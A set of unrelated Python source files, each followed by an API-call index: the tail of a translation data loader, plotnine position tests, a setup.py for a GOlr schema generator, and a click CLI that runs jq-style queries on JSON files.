resp = self.data[key]['resp'][j]
res_post[i, :len(post)] = post
res_resp[i, :len(resp)] = resp
res["post_allvocabs"] = res_post.copy()
res["resp_allvocabs"] = res_resp.copy()
res_post[res_post >= self.valid_vocab_len] = self.unk_id
res_resp[res_resp >= self.valid_vocab_len] = self.unk_id
		if key == 'train':
			res['score'] = np.array([self.data[key]['score'][i] for i in indexes])
return res
def main():
max_sent_length = 50
loader = TranslationWithScore('./data/iwslt14_raml', 10, max_sent_length, 0, 'nltk', False)
loader.restart("train",batch_size=2,shuffle=True)
q=loader.get_next_batch("train")
print(len(q['score']))
print(q)
if __name__ == '__main__':
main()
| [
"itertools.chain.from_iterable",
"collections.Counter",
"numpy.max",
"numpy.array"
] | [((15676, 15731), 'numpy.array', 'np.array', (["[self.data[key]['score'][i] for i in indexes]"], {}), "([self.data[key]['score'][i] for i in indexes])\n", (15684, 15731), True, 'import numpy as np\n'), ((15048, 15074), 'numpy.max', 'np.max', (["res['post_length']"], {}), "(res['post_length'])\n", (15054, 15074), True, 'import numpy as np\n'), ((15143, 15169), 'numpy.max', 'np.max', (["res['resp_length']"], {}), "(res['resp_length'])\n", (15149, 15169), True, 'import numpy as np\n'), ((8020, 8043), 'collections.Counter', 'Counter', (['raw_vocab_list'], {}), '(raw_vocab_list)\n', (8027, 8043), False, 'from collections import Counter\n'), ((8532, 8555), 'collections.Counter', 'Counter', (['raw_vocab_list'], {}), '(raw_vocab_list)\n', (8539, 8555), False, 'from collections import Counter\n'), ((10352, 10373), 'numpy.array', 'np.array', (['sent_length'], {}), '(sent_length)\n', (10360, 10373), True, 'import numpy as np\n'), ((10600, 10676), 'itertools.chain.from_iterable', 'chain.from_iterable', (['(origin_data[key][sess_key] for sess_key in session_keys)'], {}), '(origin_data[key][sess_key] for sess_key in session_keys)\n', (10619, 10676), False, 'from itertools import chain\n'), ((10841, 10862), 'numpy.array', 'np.array', (['turn_length'], {}), '(turn_length)\n', (10849, 10862), True, 'import numpy as np\n')] |
import string
import numpy as np
import pandas as pd
import pytest
from plotnine import (ggplot, aes, geom_point, geom_jitter, geom_bar,
geom_col, geom_boxplot, geom_text, geom_rect,
after_stat, position_dodge, position_dodge2,
position_jitter, position_jitterdodge,
position_nudge, position_stack, theme)
from plotnine.positions.position import position
from plotnine.exceptions import PlotnineError
n = 6
m = 10
random_state = np.random.RandomState(1234567890)
df1 = pd.DataFrame({'x': [1, 2, 1, 2],
'y': [1, 1, 2, 2]})
df2 = pd.DataFrame({'x': np.repeat(range(n+1), range(n+1)),
'z': np.repeat(range(n//2), range(3, n*2, 4))})
df3 = pd.DataFrame({
'x': random_state.choice(['A', 'B'], n*m),
'y': random_state.randint(0, 20, n*m),
'c': random_state.choice([False, False, True, False], n*m)
})
random_state.seed(1234567890)
_theme = theme(subplots_adjust={'right': 0.85})
def test_jitter():
df1 = pd.DataFrame({'x': [1, 2, 1, 2],
'y': [1, 1, 2, 2]})
p = (ggplot(df1, aes('x', 'y')) +
geom_point(size=10) +
geom_jitter(size=10, color='red', random_state=random_state) +
geom_jitter(size=10, color='blue', width=0.1,
height=0.1, random_state=random_state))
assert p + _theme == 'jitter'
with pytest.raises(PlotnineError):
geom_jitter(position=position_jitter(), width=0.1)
def test_nudge():
p = (ggplot(df1, aes('x', 'y')) +
geom_point(size=10) +
geom_point(size=10, color='red',
position=position_nudge(.25, .25)))
assert p + _theme == 'nudge'
def test_stack():
p = (ggplot(df2, aes('factor(z)')) +
geom_bar(aes(fill='factor(x)'), position='stack'))
assert p + _theme == 'stack'
def test_stack_negative():
df = df1.copy()
_loc = df.columns.get_loc
df.iloc[0, _loc('y')] *= -1
df.iloc[len(df)-1, _loc('y')] *= -1
p = (ggplot(df)
+ geom_col(aes('factor(x)', 'y', fill='factor(y)'),
position='stack')
+ geom_text(aes('factor(x)', 'y', label='y'),
position=position_stack(vjust=0.5))
)
assert p + _theme == 'stack-negative'
def test_fill():
p = (ggplot(df2, aes('factor(z)')) +
geom_bar(aes(fill='factor(x)'), position='fill'))
assert p + _theme == 'fill'
def test_dodge():
p = (ggplot(df2, aes('factor(z)')) +
geom_bar(aes(fill='factor(x)'), position='dodge'))
assert p + _theme == 'dodge'
def test_dodge_preserve_single():
df1 = pd.DataFrame({'x': ['a', 'b', 'b'],
'y': ['a', 'a', 'b']})
p = (ggplot(df1, aes('x', fill='y')) +
geom_bar(position=position_dodge(preserve='single')))
assert p + _theme == 'dodge_preserve_single'
def test_dodge_preserve_single_text():
df1 = pd.DataFrame({'x': ['a', 'b', 'b', 'b'],
'y': ['a', 'a', 'b', 'b']})
d = position_dodge(preserve='single', width=0.9)
p = (ggplot(df1, aes('x', fill='y'))
+ geom_bar(position=d)
+ geom_text(
aes(y=after_stat('count'), label=after_stat('count')),
stat='count',
position=d,
va='bottom')
)
assert p + _theme == 'dodge_preserve_single_text'
def test_dodge2():
p = (ggplot(df3, aes('x', 'y', color='c')) +
geom_boxplot(position='dodge2', size=2))
assert p + _theme == 'dodge2'
def test_dodge2_varwidth():
p = (ggplot(df3, aes('x', 'y', color='c')) +
geom_boxplot(
position=position_dodge2(preserve='single'),
varwidth=True,
size=2)
)
assert p + _theme == 'dodge2_varwidth'
def test_jitterdodge():
df = pd.DataFrame({
'x': np.ones(n*2),
'y': np.repeat(np.arange(n), 2),
'letters': np.repeat(list(string.ascii_lowercase[:n]), 2)})
position = position_jitterdodge(random_state=random_state)
p = (ggplot(df, aes('x', 'y', fill='letters')) +
geom_point(size=10, fill='black') +
geom_point(size=10, position=position))
assert p + _theme == 'jitterdodge'
def test_position_from_geom():
geom = geom_point(position='jitter')
assert isinstance(position.from_geom(geom), position_jitter)
geom = geom_point(position='position_jitter')
assert isinstance(position.from_geom(geom), position_jitter)
geom = geom_point(position=position_jitter())
assert isinstance(position.from_geom(geom), position_jitter)
geom = geom_point(position=position_jitter)
assert isinstance(position.from_geom(geom), position_jitter)
def test_dodge_empty_data():
empty_df = pd.DataFrame({'x': [], 'y': []})
p = (ggplot(df1, aes('x', 'y'))
+ geom_point()
+ geom_rect(
empty_df,
aes(xmin='x', xmax='x+1', ymin='y', ymax='y+1'),
position='dodge')
)
p.draw_test()
| [
"plotnine.geom_boxplot",
"plotnine.position_dodge2",
"numpy.ones",
"numpy.arange",
"plotnine.position_dodge",
"plotnine.aes",
"plotnine.position_stack",
"pandas.DataFrame",
"plotnine.position_jitter",
"plotnine.after_stat",
"numpy.random.RandomState",
"plotnine.position_nudge",
"pytest.raises",
"plotnine.ggplot",
"plotnine.position_jitterdodge",
"plotnine.theme",
"plotnine.positions.position.position.from_geom",
"plotnine.geom_bar",
"plotnine.geom_point",
"plotnine.geom_jitter"
] | [((520, 553), 'numpy.random.RandomState', 'np.random.RandomState', (['(1234567890)'], {}), '(1234567890)\n', (541, 553), True, 'import numpy as np\n'), ((560, 612), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': [1, 2, 1, 2], 'y': [1, 1, 2, 2]}"], {}), "({'x': [1, 2, 1, 2], 'y': [1, 1, 2, 2]})\n", (572, 612), True, 'import pandas as pd\n'), ((977, 1015), 'plotnine.theme', 'theme', ([], {'subplots_adjust': "{'right': 0.85}"}), "(subplots_adjust={'right': 0.85})\n", (982, 1015), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1047, 1099), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': [1, 2, 1, 2], 'y': [1, 1, 2, 2]}"], {}), "({'x': [1, 2, 1, 2], 'y': [1, 1, 2, 2]})\n", (1059, 1099), True, 'import pandas as pd\n'), ((2675, 2733), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': ['a', 'b', 'b'], 'y': ['a', 'a', 'b']}"], {}), "({'x': ['a', 'b', 'b'], 'y': ['a', 'a', 'b']})\n", (2687, 2733), True, 'import pandas as pd\n'), ((2964, 3032), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': ['a', 'b', 'b', 'b'], 'y': ['a', 'a', 'b', 'b']}"], {}), "({'x': ['a', 'b', 'b', 'b'], 'y': ['a', 'a', 'b', 'b']})\n", (2976, 3032), True, 'import pandas as pd\n'), ((3066, 3110), 'plotnine.position_dodge', 'position_dodge', ([], {'preserve': '"""single"""', 'width': '(0.9)'}), "(preserve='single', width=0.9)\n", (3080, 3110), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4035, 4082), 'plotnine.position_jitterdodge', 'position_jitterdodge', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (4055, 4082), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4314, 4343), 'plotnine.geom_point', 'geom_point', ([], {'position': '"""jitter"""'}), "(position='jitter')\n", (4324, 4343), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4421, 4459), 'plotnine.geom_point', 'geom_point', ([], {'position': '"""position_jitter"""'}), "(position='position_jitter')\n", (4431, 4459), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4653, 4689), 'plotnine.geom_point', 'geom_point', ([], {'position': 'position_jitter'}), '(position=position_jitter)\n', (4663, 4689), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4801, 4833), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': [], 'y': []}"], {}), "({'x': [], 'y': []})\n", (4813, 4833), True, 'import pandas as pd\n'), ((1274, 1363), 'plotnine.geom_jitter', 'geom_jitter', ([], 
{'size': '(10)', 'color': '"""blue"""', 'width': '(0.1)', 'height': '(0.1)', 'random_state': 'random_state'}), "(size=10, color='blue', width=0.1, height=0.1, random_state=\n random_state)\n", (1285, 1363), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1425, 1453), 'pytest.raises', 'pytest.raises', (['PlotnineError'], {}), '(PlotnineError)\n', (1438, 1453), False, 'import pytest\n'), ((3496, 3535), 'plotnine.geom_boxplot', 'geom_boxplot', ([], {'position': '"""dodge2"""', 'size': '(2)'}), "(position='dodge2', size=2)\n", (3508, 3535), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4191, 4229), 'plotnine.geom_point', 'geom_point', ([], {'size': '(10)', 'position': 'position'}), '(size=10, position=position)\n', (4201, 4229), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4366, 4390), 'plotnine.positions.position.position.from_geom', 'position.from_geom', (['geom'], {}), '(geom)\n', (4384, 4390), False, 'from plotnine.positions.position import position\n'), ((4482, 4506), 'plotnine.positions.position.position.from_geom', 'position.from_geom', (['geom'], {}), '(geom)\n', (4500, 4506), False, 'from plotnine.positions.position import position\n'), ((4598, 4622), 'plotnine.positions.position.position.from_geom', 'position.from_geom', (['geom'], {}), '(geom)\n', (4616, 4622), False, 'from plotnine.positions.position import position\n'), ((4712, 4736), 'plotnine.positions.position.position.from_geom', 'position.from_geom', (['geom'], {}), '(geom)\n', (4730, 4736), False, 'from plotnine.positions.position import position\n'), ((1202, 1262), 'plotnine.geom_jitter', 'geom_jitter', ([], {'size': '(10)', 'color': '"""red"""', 'random_state': 'random_state'}), "(size=10, color='red', random_state=random_state)\n", (1213, 1262), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1581, 1600), 'plotnine.geom_point', 'geom_point', ([], {'size': '(10)'}), '(size=10)\n', (1591, 1600), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1775, 1791), 'plotnine.aes', 'aes', (['"""factor(z)"""'], {}), "('factor(z)')\n", (1778, 1791), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1813, 1834), 'plotnine.aes', 'aes', ([], {'fill': '"""factor(x)"""'}), "(fill='factor(x)')\n", (1816, 1834), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, 
after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2048, 2058), 'plotnine.ggplot', 'ggplot', (['df'], {}), '(df)\n', (2054, 2058), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2179, 2211), 'plotnine.aes', 'aes', (['"""factor(x)"""', '"""y"""'], {'label': '"""y"""'}), "('factor(x)', 'y', label='y')\n", (2182, 2211), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2364, 2380), 'plotnine.aes', 'aes', (['"""factor(z)"""'], {}), "('factor(z)')\n", (2367, 2380), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2402, 2423), 'plotnine.aes', 'aes', ([], {'fill': '"""factor(x)"""'}), "(fill='factor(x)')\n", (2405, 2423), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2516, 2532), 'plotnine.aes', 'aes', (['"""factor(z)"""'], {}), "('factor(z)')\n", (2519, 2532), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2554, 2575), 'plotnine.aes', 'aes', ([], {'fill': '"""factor(x)"""'}), "(fill='factor(x)')\n", (2557, 2575), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2779, 2797), 'plotnine.aes', 'aes', (['"""x"""'], {'fill': '"""y"""'}), "('x', fill='y')\n", (2782, 2797), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3163, 3183), 'plotnine.geom_bar', 'geom_bar', ([], {'position': 'd'}), '(position=d)\n', (3171, 3183), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3459, 3483), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {'color': '"""c"""'}), "('x', 'y', color='c')\n", (3462, 3483), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3622, 3646), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {'color': '"""c"""'}), "('x', 'y', color='c')\n", (3625, 3646), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, 
geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3897, 3911), 'numpy.ones', 'np.ones', (['(n * 2)'], {}), '(n * 2)\n', (3904, 3911), True, 'import numpy as np\n'), ((4146, 4179), 'plotnine.geom_point', 'geom_point', ([], {'size': '(10)', 'fill': '"""black"""'}), "(size=10, fill='black')\n", (4156, 4179), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4557, 4574), 'plotnine.position_jitter', 'position_jitter', ([], {}), '()\n', (4572, 4574), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4881, 4893), 'plotnine.geom_point', 'geom_point', ([], {}), '()\n', (4891, 4893), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4952, 4999), 'plotnine.aes', 'aes', ([], {'xmin': '"""x"""', 'xmax': '"""x+1"""', 'ymin': '"""y"""', 'ymax': '"""y+1"""'}), "(xmin='x', xmax='x+1', ymin='y', ymax='y+1')\n", (4955, 4999), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1171, 1190), 'plotnine.geom_point', 'geom_point', ([], {'size': '(10)'}), '(size=10)\n', (1181, 1190), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1484, 1501), 'plotnine.position_jitter', 'position_jitter', ([], {}), '()\n', (1499, 1501), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1555, 1568), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {}), "('x', 'y')\n", (1558, 1568), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1674, 1700), 'plotnine.position_nudge', 'position_nudge', (['(0.25)', '(0.25)'], {}), '(0.25, 0.25)\n', (1688, 1700), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2079, 2118), 'plotnine.aes', 'aes', (['"""factor(x)"""', '"""y"""'], {'fill': '"""factor(y)"""'}), "('factor(x)', 'y', fill='factor(y)')\n", (2082, 2118), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, 
position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2243, 2268), 'plotnine.position_stack', 'position_stack', ([], {'vjust': '(0.5)'}), '(vjust=0.5)\n', (2257, 2268), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2828, 2861), 'plotnine.position_dodge', 'position_dodge', ([], {'preserve': '"""single"""'}), "(preserve='single')\n", (2842, 2861), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3132, 3150), 'plotnine.aes', 'aes', (['"""x"""'], {'fill': '"""y"""'}), "('x', fill='y')\n", (3135, 3150), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3695, 3729), 'plotnine.position_dodge2', 'position_dodge2', ([], {'preserve': '"""single"""'}), "(preserve='single')\n", (3710, 3729), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3934, 3946), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (3943, 3946), True, 'import numpy as np\n'), ((4104, 4133), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {'fill': '"""letters"""'}), "('x', 'y', fill='letters')\n", (4107, 4133), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4855, 4868), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {}), "('x', 'y')\n", (4858, 4868), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1145, 1158), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {}), "('x', 'y')\n", (1148, 1158), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3225, 3244), 'plotnine.after_stat', 'after_stat', (['"""count"""'], {}), "('count')\n", (3235, 3244), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3252, 3271), 'plotnine.after_stat', 'after_stat', (['"""count"""'], {}), "('count')\n", (3262, 3271), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n')] |
from setuptools import setup, find_packages
NAME = 'golr-schema-generator'
DESCRIPTION = 'GOlr Schema Generator'
URL = 'https://github.com/deepakunni3/golr-schema-generator'
AUTHOR = '<NAME>'
EMAIL = '<EMAIL>'
REQUIRES_PYTHON = '>=3.7.0'
VERSION = '0.0.1'
LICENSE = 'BSD3'
REQUIRED = [
'PyYAML>=5.3'
]
EXTRAS = {
'test': ['pytest']
}
setup(
name=NAME,
version=VERSION,
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
description=DESCRIPTION,
long_description=open('README.md').read(),
license=LICENSE,
packages=find_packages(),
keywords='Solr GOlr golr-schema',
classifiers=[
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3'
],
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True
) | [
"setuptools.find_packages"
] | [((593, 608), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (606, 608), False, 'from setuptools import setup, find_packages\n')] |
import json
import click
from tokenizer import get_grouped_tokens, TokenName
NULL = "null"
# From the click documentation: a Group subclass that resolves unambiguous command prefixes (aliases).
class AliasedGroup(click.Group):
def get_command(self, ctx, cmd_name):
rv = click.Group.get_command(self, ctx, cmd_name)
if rv is not None:
return rv
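        # No exact match: fall back to commands for which cmd_name is an unambiguous prefix.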
matches = [x for x in self.list_commands(ctx)
if x.startswith(cmd_name)]
if not matches:
return None
elif len(matches) == 1:
return click.Group.get_command(self, ctx, matches[0])
ctx.fail('Too many matches: %s' % ', '.join(sorted(matches)))
@click.command()
@click.option("--expression", "-e", type=click.STRING, help="jq style expression to search in the json", required=True)
@click.option("--file", "-f", type=click.File("r"), help="File with valid json content", required=True)
def cli(expression, file):
all_tokens = [g for g in get_grouped_tokens(expression)]
validate_tokens(all_tokens, expression)
json_obj = get_json(file)
result = jq_parser(json_obj, all_tokens)
result = json.dumps(result, indent=4)
click.echo(result)
def jq_parser(json_obj, tokens):
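    # Recursively consume one token group per call, walking down into dicts and lists of the JSON object.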
if not (json_obj and json_obj != NULL and tokens):
return json_obj
    if len(tokens) == 1:
token = tokens[0]
return retrieve_token_from_json(json_obj, token)
first_token = tokens[0]
remaining_tokens = tokens[1:]
if isinstance(json_obj, list):
result = []
for obj in json_obj:
r = retrieve_token_from_json(obj, first_token)
if r and r != NULL:
result.append(jq_parser(r, remaining_tokens))
else:
result.append(NULL)
index = _get_index(first_token)
if index is None:
return result
if index >= len(result):
raise click.ClickException(f"Bad index {index}. There are only {len(result)} elements in the array")
return result[index]
elif isinstance(json_obj, dict):
r = retrieve_token_from_json(json_obj, first_token)
return jq_parser(r, remaining_tokens)
def retrieve_token_from_json(json_obj, token):
if not (json_obj and json_obj != NULL and token):
return json_obj
index = _get_index(token)
if isinstance(json_obj, list):
result = []
for obj in json_obj:
#this is probably the only case for a valid json
if isinstance(obj, dict):
#case insensitive
obj = {k.strip().lower() : v for k,v in obj.items()}
result.append(obj.get(token[0].value.strip().lower(), NULL))
if index is None:
return result
if index >= len(result):
raise click.ClickException(f"Bad index {index}. There are only {len(result)} elements in the array")
return result[index]
elif isinstance(json_obj, dict):
#case insensitive
json_obj = {k.strip().lower() : v for k,v in json_obj.items()}
val = json_obj.get(token[0].value.strip().lower(), NULL)
if isinstance(val, list):
if index is None:
return val
if index >= len(val):
raise click.ClickException(f"Bad index {index}. There are only {len(val)} elements in the array")
return val[index]
return val
def get_json(fp):
try:
return json.load(fp)
except Exception as ex:
raise click.ClickException(str(ex))
def validate_tokens(all_tokens, expression):
if not all_tokens or len(all_tokens) == 0:
raise click.ClickException(f"{expression} is a bad expression")
for g in all_tokens:
if not g:
raise click.ClickException(f"{expression} is a bad expression. Currently not supporting unix style multiple dots (such as .. etc)")
if len(g) == 1:
if not ( g[0].name == TokenName.KEY ):
message = str(g[0])
raise click.ClickException(f"{message} is a bad token. Currently supports either plain key or key with one index (in case of array)")
elif len(g) == 2:
if not ( g[0].name == TokenName.KEY and g[1].name == TokenName.INDEX):
message = str(g[0]) + ", " + str(g[1])
raise click.ClickException(f"{message} is a bad token. Currently supports either plain key or key with one index (in case of array)")
elif len(g) > 2:
message = ", ".join([str(r) for r in g])
raise click.ClickException(f"{message} is a bad token. Currently supports either plain key or key with one index (in case of array)")
def _get_index(token):
if not token or len(token) <= 1:
return None
t = token[1]
if t.name == TokenName.INDEX:
if t.value.strip().isdecimal():
return int(t.value.strip())
else:
raise click.ClickException(f"{t.value} is a bad value where a numeric index of >= 0 is expected")
return None | [
"click.Group.get_command",
"json.load",
"click.option",
"click.echo",
"json.dumps",
"click.command",
"click.File",
"click.ClickException",
"tokenizer.get_grouped_tokens"
] | [((645, 660), 'click.command', 'click.command', ([], {}), '()\n', (658, 660), False, 'import click\n'), ((662, 785), 'click.option', 'click.option', (['"""--expression"""', '"""-e"""'], {'type': 'click.STRING', 'help': '"""jq style expression to search in the json"""', 'required': '(True)'}), "('--expression', '-e', type=click.STRING, help=\n 'jq style expression to search in the json', required=True)\n", (674, 785), False, 'import click\n'), ((1105, 1133), 'json.dumps', 'json.dumps', (['result'], {'indent': '(4)'}), '(result, indent=4)\n', (1115, 1133), False, 'import json\n'), ((1138, 1156), 'click.echo', 'click.echo', (['result'], {}), '(result)\n', (1148, 1156), False, 'import click\n'), ((233, 277), 'click.Group.get_command', 'click.Group.get_command', (['self', 'ctx', 'cmd_name'], {}), '(self, ctx, cmd_name)\n', (256, 277), False, 'import click\n'), ((816, 831), 'click.File', 'click.File', (['"""r"""'], {}), "('r')\n", (826, 831), False, 'import click\n'), ((3429, 3442), 'json.load', 'json.load', (['fp'], {}), '(fp)\n', (3438, 3442), False, 'import json\n'), ((3622, 3679), 'click.ClickException', 'click.ClickException', (['f"""{expression} is a bad expression"""'], {}), "(f'{expression} is a bad expression')\n", (3642, 3679), False, 'import click\n'), ((941, 971), 'tokenizer.get_grouped_tokens', 